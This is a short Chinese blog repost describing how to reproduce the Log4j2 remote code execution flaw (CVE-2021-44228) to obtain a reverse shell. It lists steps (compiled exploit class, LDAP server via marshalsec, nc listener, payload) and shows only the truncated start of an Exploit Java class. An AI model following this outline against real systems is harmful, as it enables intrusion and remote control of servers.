Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell)

文章目录
1、构造EXP2、使用javac进行编译3、将.class文件放到web根目录下4、使用marshalsec-0.0.3-SNAPSHOT-all.jar开启一个ldap的服务5、nc开启监听6、准备工作完毕,上payload7、靶场测试8、成功反弹shell

最近log4j2可谓是无人不知无人不晓,出去吹牛不知道这个还好意思说自己是做安全的嘛!今天我就来复现一下
1、构造EXP
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.lang.Runtime;
import java.lang.Process;

public class Exploit{
public Exploit() throws Excep

Log4j2 远程代码执行漏洞(cve-2021-44228)复现(反弹shell)最先出现在Python成神之路

版权声明:
作者:cc
链接:https://www.techfm.club/p/9550.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>